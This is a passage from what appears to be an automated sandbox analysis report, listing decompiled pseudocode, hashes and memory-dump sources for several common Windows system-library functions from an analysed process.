                                                                  0x04962a72
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 822ed74ef9c30dacf5fcb5bfd0f0d8460bdea8a1654fa0a631ab9b1512e9c90e
                                                                  • Instruction ID: e912a61f56ac414ab0eaf17bfd8d216a4b24f401317f1830a5455f1079b04c37
                                                                  • Opcode Fuzzy Hash: 822ed74ef9c30dacf5fcb5bfd0f0d8460bdea8a1654fa0a631ab9b1512e9c90e
                                                                  • Instruction Fuzzy Hash: 17517E71A00209EFDF25EF54C940ADEBBB6BF48314F1180B5E912AB2A0D375AD52DF90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04964D3B, Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 78%
                                                                  			E04964D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4a2d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0497FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4a27bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0497B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04954620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E0493CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E0497B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0497F380(_t67 + 0xc, 0x4915138, 0x10) == 0) {
								 *0x4a260d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04964F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04964E70(0x4a286b0, 0x4965690, 0, 0) != 0) {
					_t46 = E0493CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                  0x04964d3b
                                                                  0x04964d4d
                                                                  0x04964d53
                                                                  0x04964d58
                                                                  0x04964d65
                                                                  0x04964d6c
                                                                  0x04964d71
                                                                  0x04964d77
                                                                  0x04964d7f
                                                                  0x04964d8c
                                                                  0x04964d8e
                                                                  0x04964dad
                                                                  0x04964db0
                                                                  0x04964db7
                                                                  0x04964db8
                                                                  0x04964db9
                                                                  0x04964dba
                                                                  0x04964dbb
                                                                  0x04964dc1
                                                                  0x04964dc8
                                                                  0x04964dcc
                                                                  0x04964dd5
                                                                  0x04964dde
                                                                  0x04964ddf
                                                                  0x04964de0
                                                                  0x04964de1
                                                                  0x04964de6
                                                                  0x04964de7
                                                                  0x04964de9
                                                                  0x04964df3
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a6c7c
                                                                  0x049a6c8a
                                                                  0x049a6c8a
                                                                  0x049a6c9d
                                                                  0x049a6ca7
                                                                  0x049a6cac
                                                                  0x049a6cb2
                                                                  0x049a6cb9
                                                                  0x00000000
                                                                  0x049a6cbf
                                                                  0x049a6cbf
                                                                  0x00000000
                                                                  0x049a6cbf
                                                                  0x049a6cb9
                                                                  0x04964dfb
                                                                  0x049a6ccf
                                                                  0x049a6cd3
                                                                  0x04964e32
                                                                  0x04964e39
                                                                  0x049a6ce0
                                                                  0x049a6cf2
                                                                  0x049a6cf2
                                                                  0x049a6ce0
                                                                  0x04964e3f
                                                                  0x04964e41
                                                                  0x04964e51
                                                                  0x04964e51
                                                                  0x04964e03
                                                                  0x04964e03
                                                                  0x04964e09
                                                                  0x04964e0f
                                                                  0x04964e57
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04964e1b
                                                                  0x04964e30
                                                                  0x04964e5b
                                                                  0x04964e5b
                                                                  0x00000000
                                                                  0x04964e30
                                                                  0x04964e11
                                                                  0x04964e11
                                                                  0x04964e16
                                                                  0x00000000
                                                                  0x04964e16
                                                                  0x04964e01
                                                                  0x00000000
                                                                  0x04964e01
                                                                  0x04964da5
                                                                  0x049a6c6b
                                                                  0x00000000
                                                                  0x04964dab
                                                                  0x04964dab
                                                                  0x00000000
                                                                  0x04964dab

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 64457a1650b1605407dab55593bf3adbb4fff9d99b80deb3e9626c1d75a7ec22
                                                                  • Instruction ID: 1017ef487741d0d988b1e4d3ccb2450077de21bd3975f47e024591792a928074
                                                                  • Opcode Fuzzy Hash: 64457a1650b1605407dab55593bf3adbb4fff9d99b80deb3e9626c1d75a7ec22
                                                                  • Instruction Fuzzy Hash: 39411571A40318AFEB32DF54CD84FA6B7AAEB84714F0404B9E9469B280D774FD40CB95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04964BAD, Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E04964BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4a2d360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E0493CC50(_t86);
					L11:
					return E0497B640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4a28504
				E04952280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E0497FA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E0497B0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04954620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E0493CCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4a28504
								E0494FFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04964F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}


























                                                                  0x04964bad
                                                                  0x04964bbf
                                                                  0x04964bc2
                                                                  0x04964bc6
                                                                  0x04964bcd
                                                                  0x04964bd9
                                                                  0x049a67fe
                                                                  0x049a6800
                                                                  0x04964ccc
                                                                  0x04964ccd
                                                                  0x04964cb7
                                                                  0x04964cc9
                                                                  0x04964cc9
                                                                  0x04964bdf
                                                                  0x04964be5
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04964beb
                                                                  0x04964bef
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04964bf5
                                                                  0x04964bf9
                                                                  0x04964c06
                                                                  0x04964c0b
                                                                  0x04964c17
                                                                  0x04964c1c
                                                                  0x04964c1f
                                                                  0x04964c25
                                                                  0x04964c33
                                                                  0x04964c3d
                                                                  0x04964c40
                                                                  0x04964c43
                                                                  0x04964c47
                                                                  0x04964c4d
                                                                  0x04964c53
                                                                  0x04964c54
                                                                  0x04964c55
                                                                  0x04964c56
                                                                  0x04964c5b
                                                                  0x04964c5c
                                                                  0x04964c63
                                                                  0x04964c6b
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x049a6776
                                                                  0x049a6784
                                                                  0x049a6784
                                                                  0x049a679f
                                                                  0x049a67a7
                                                                  0x049a67af
                                                                  0x049a67ce
                                                                  0x00000000
                                                                  0x049a67b1
                                                                  0x049a67b7
                                                                  0x049a67b8
                                                                  0x049a67c1
                                                                  0x049a67d3
                                                                  0x049a67d9
                                                                  0x049a67dd
                                                                  0x04964c94
                                                                  0x04964c94
                                                                  0x04964c98
                                                                  0x04964c9c
                                                                  0x04964ca3
                                                                  0x049a67f4
                                                                  0x049a67f4
                                                                  0x04964cb5
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04964cb5
                                                                  0x04964c79
                                                                  0x04964c7e
                                                                  0x04964c89
                                                                  0x04964c8b
                                                                  0x04964c8f
                                                                  0x04964c8f
                                                                  0x00000000
                                                                  0x04964c89
                                                                  0x049a67c3
                                                                  0x00000000
                                                                  0x049a67c3
                                                                  0x049a67af
                                                                  0x04964c73
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x00000000

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: df76a35c53cf96a0aa12e5a9fc4befd4711a004318d71fe62795eab1159160a2
                                                                  • Instruction ID: c4d43491aeb1ef168498dd263bcaefc0257a4e0646ffa36600f7572151efba5d
                                                                  • Opcode Fuzzy Hash: df76a35c53cf96a0aa12e5a9fc4befd4711a004318d71fe62795eab1159160a2
                                                                  • Instruction Fuzzy Hash: 7341A435A402289BDB20DFA8C940BEA77B8EF85710F0505B5E949AB340DB74BE84CF95
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04948A0A, Relevance: .1, Instructions: 120COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 94%
                                                                  			E04948A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4a2d360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E0497B640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E0494E9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4911180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04961DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04973C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04948999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}



























                                                                  0x04948a0a
                                                                  0x04948a1c
                                                                  0x04948a23
                                                                  0x04948a2e
                                                                  0x04948a30
                                                                  0x04948a36
                                                                  0x04948a3c
                                                                  0x04948a3e
                                                                  0x04948a4a
                                                                  0x04948a52
                                                                  0x04948a9c
                                                                  0x04948aae
                                                                  0x04948a58
                                                                  0x04948a5e
                                                                  0x04948a6a
                                                                  0x04948a6f
                                                                  0x04948a75
                                                                  0x04948a7d
                                                                  0x04948a85
                                                                  0x04948a86
                                                                  0x04948a89
                                                                  0x04948a93
                                                                  0x04948a99
                                                                  0x04948a9b
                                                                  0x00000000
                                                                  0x04948aaf
                                                                  0x04948abe
                                                                  0x04948ac3
                                                                  0x04948acb
                                                                  0x04948ad7
                                                                  0x04948ae0
                                                                  0x04948af1
                                                                  0x00000000
                                                                  0x04948af1
                                                                  0x04948acd
                                                                  0x04948ad5
                                                                  0x04948afb
                                                                  0x04948afd
                                                                  0x04948aff
                                                                  0x04948b07
                                                                  0x04948b22
                                                                  0x04948b24
                                                                  0x04948b2a
                                                                  0x04948b2e
                                                                  0x04948b3f
                                                                  0x04948b78
                                                                  0x04948b41
                                                                  0x04948b52
                                                                  0x04948b54
                                                                  0x04948b5c
                                                                  0x04948b74
                                                                  0x04948b74
                                                                  0x04948b5c
                                                                  0x04948b3f
                                                                  0x04948b5e
                                                                  0x04948b61
                                                                  0x04948b64
                                                                  0x04948b64
                                                                  0x04948b6c
                                                                  0x04948b6c
                                                                  0x04948b11
                                                                  0x04999cd5
                                                                  0x04999cd5
                                                                  0x04948b17
                                                                  0x04948b1a
                                                                  0x04948b1a
                                                                  0x00000000
                                                                  0x04948ad5
                                                                  0x04948a89

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e8fa6f3e0d2384d56f5b53fc7b67d9f5a99787bc16e0a8894b5e378c0a79e177
                                                                  • Instruction ID: bd7bf07e05e04ed4c9ef5a8eab94463704879a35132d063ca48ff717914323e9
                                                                  • Opcode Fuzzy Hash: e8fa6f3e0d2384d56f5b53fc7b67d9f5a99787bc16e0a8894b5e378c0a79e177
                                                                  • Instruction Fuzzy Hash: 6F4130B5A402289FDB24EF55CC88EA9B7F9EB84304F1045F9D91997251E770AE80CF50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 049B69A6, Relevance: .1, Instructions: 108COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 69%
                                                                  			E049B69A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4a2d360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04946C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E049B6BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04979980() >= 0) {
							E04952280(_t56, 0x4a28778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4a28774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4a28774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E0493B6F0(0x491c338, 0x491c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04979520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E049795D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E0494FFB0(_t68, _t77, 0x4a28778);
				}
				_pop(_t78);
				return E0497B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}
































                                                                  0x049b69b5
                                                                  0x049b69be
                                                                  0x049b69c3
                                                                  0x049b69c9
                                                                  0x049b69cc
                                                                  0x049b69d1
                                                                  0x049b69d3
                                                                  0x049b69de
                                                                  0x049b69e1
                                                                  0x049b69ea
                                                                  0x049b69f6
                                                                  0x049b69fe
                                                                  0x049b6a13
                                                                  0x049b6a14
                                                                  0x049b6a15
                                                                  0x049b6a16
                                                                  0x049b6a1e
                                                                  0x049b6a26
                                                                  0x049b6a31
                                                                  0x049b6a36
                                                                  0x049b6a37
                                                                  0x049b6a40
                                                                  0x049b6a49
                                                                  0x049b6a4a
                                                                  0x049b6a53
                                                                  0x049b6a59
                                                                  0x049b6a5d
                                                                  0x049b6a5e
                                                                  0x049b6a64
                                                                  0x049b6a67
                                                                  0x049b6a6a
                                                                  0x049b6a6d
                                                                  0x049b6a70
                                                                  0x049b6a77
                                                                  0x049b6a7d
                                                                  0x049b6a86
                                                                  0x049b6a89
                                                                  0x049b6a9c
                                                                  0x049b6a9f
                                                                  0x049b6aa2
                                                                  0x049b6aa5
                                                                  0x049b6aaf
                                                                  0x049b6ab1
                                                                  0x049b6ab8
                                                                  0x049b6ab9
                                                                  0x049b6abb
                                                                  0x049b6abe
                                                                  0x049b6ac5
                                                                  0x049b6ac5
                                                                  0x049b6aaf
                                                                  0x049b6a40
                                                                  0x049b6a26
                                                                  0x049b69fe
                                                                  0x049b6ace
                                                                  0x049b6ad0
                                                                  0x049b6ad3
                                                                  0x049b6ad8
                                                                  0x049b6adf
                                                                  0x049b6adf
                                                                  0x049b6ae8
                                                                  0x049b6aef
                                                                  0x049b6aef
                                                                  0x049b6af9
                                                                  0x049b6b06

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5b314d93c771038bdcf8f5fd6daa9f1322d26516c52ca05bf81c962aa178eff9
                                                                  • Instruction ID: 5913f73e72462d655c4dacbdf768270093cfe77dec96ff8fe60880efeef4f0de
                                                                  • Opcode Fuzzy Hash: 5b314d93c771038bdcf8f5fd6daa9f1322d26516c52ca05bf81c962aa178eff9
                                                                  • Instruction Fuzzy Hash: A3414CB1D00208AFDB24DFA5D940BFEBBF8EF88714F148139E954A6250DB74A905CB51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04935210, Relevance: .1, Instructions: 107COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 85%
                                                                  			E04935210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E049352A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E049795D0();
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E0494EB70(_t54, 0x4a279a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E049795D0();
								L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E0494EB70(_t54, 0x4a279a0);
						}
						return _t52;
					}
					L5:
					_t33 = E0497F3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E0494EB70(_t54, 0x4a279a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E049795D0();
							L049577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}














                                                                  0x04935220
                                                                  0x04935224
                                                                  0x04990d13
                                                                  0x04990d16
                                                                  0x04990d19
                                                                  0x0493522a
                                                                  0x0493522a
                                                                  0x0493522d
                                                                  0x0493522d
                                                                  0x04935231
                                                                  0x04935235
                                                                  0x04935239
                                                                  0x04990d5c
                                                                  0x04990d62
                                                                  0x00000000
                                                                  0x00000000
                                                                  0x04990d6a
                                                                  0x04990d7b
                                                                  0x04990d7f
                                                                  0x04990d81
                                                                  0x04990d84
                                                                  0x04990d95
                                                                  0x04990d95
                                                                  0x04990d6c
                                                                  0x04990d71
                                                                  0x04990d71
                                                                  0x04990d9a
                                                                  0x00000000
                                                                  0x0493524a
                                                                  0x0493524a
                                                                  0x04935250
                                                                  0x04990d24
                                                                  0x04990d35
                                                                  0x04990d39
                                                                  0x04990d3b
                                                                  0x04990d3e
                                                                  0x04990d50
                                                                  0x04990d50
                                                                  0x04990d26
                                                                  0x04990d2b
                                                                  0x04990d2b
                                                                  0x00000000
                                                                  0x04990d55
                                                                  0x04935256
                                                                  0x0493525b
                                                                  0x04935265
                                                                  0x04990da7
                                                                  0x0493526b
                                                                  0x0493526e
                                                                  0x04935272
                                                                  0x04990db1
                                                                  0x04990db4
                                                                  0x04990dc5
                                                                  0x04990dc5
                                                                  0x04935272
                                                                  0x04935278
                                                                  0x0493527e
                                                                  0x0493528a
                                                                  0x0493528c
                                                                  0x0493528d
                                                                  0x00000000
                                                                  0x04935280
                                                                  0x04935282
                                                                  0x04935288
                                                                  0x0493529f
                                                                  0x04935292
                                                                  0x00000000
                                                                  0x04935292
                                                                  0x00000000
                                                                  0x04935288
                                                                  0x0493527e

                                                                  Memory Dump Source
                                                                  • Source File: 0000000A.00000002.593272688.0000000004910000.00000040.00000001.sdmp, Offset: 04910000, based on PE: true
                                                                  • Associated: 0000000A.00000002.593706758.0000000004A2B000.00000040.00000001.sdmp Download File
                                                                  • Associated: 0000000A.00000002.593735317.0000000004A2F000.00000040.00000001.sdmp Download File
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ecc7c3b26c66b1536e04ce608d80849fea17f48bfbc3dd0e30418d7c0b29e079
                                                                  • Instruction ID: a7e62a7bbb3f9c0794d467a296d4f4d3dfa7a86a1eab687e495408e50ade30bf
                                                                  • Opcode Fuzzy Hash: ecc7c3b26c66b1536e04ce608d80849fea17f48bfbc3dd0e30418d7c0b29e079
                                                                  • Instruction Fuzzy Hash: 3B31F231651710AFDB259B18C880B2677AAFF85765F164A39E8254B1A4EB20BD00C790
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  Function 04973D43, Relevance: .1, Instructions: 106COMMON
                                                                  Download Yara Rule
                                                                  C-Code - Quality: 100%
                                                                  			E04973D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				char _v12;
				signed short** _t33;
				short* _t38;
				intOrPtr* _t39;
				intOrPtr* _t41;
				signed short _t43;
				intOrPtr* _t47;
				intOrPtr* _t53;
				signed short _t57;
				intOrPtr _t58;
				signed short _t60;
				signed short* _t61;

				_t47 = __ecx;
				_t61 = __edx;
				_t60 = ( *__ecx & 0x0000ffff) + 2;
				if(_t60 > 0xfffe) {
					L22:
					return 0xc0000106;
				}
				if(__edx != 0) {
					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
						L5:
						E04947B60(0, _t61, 0x49111c4);
						_v12 =  *_t47;
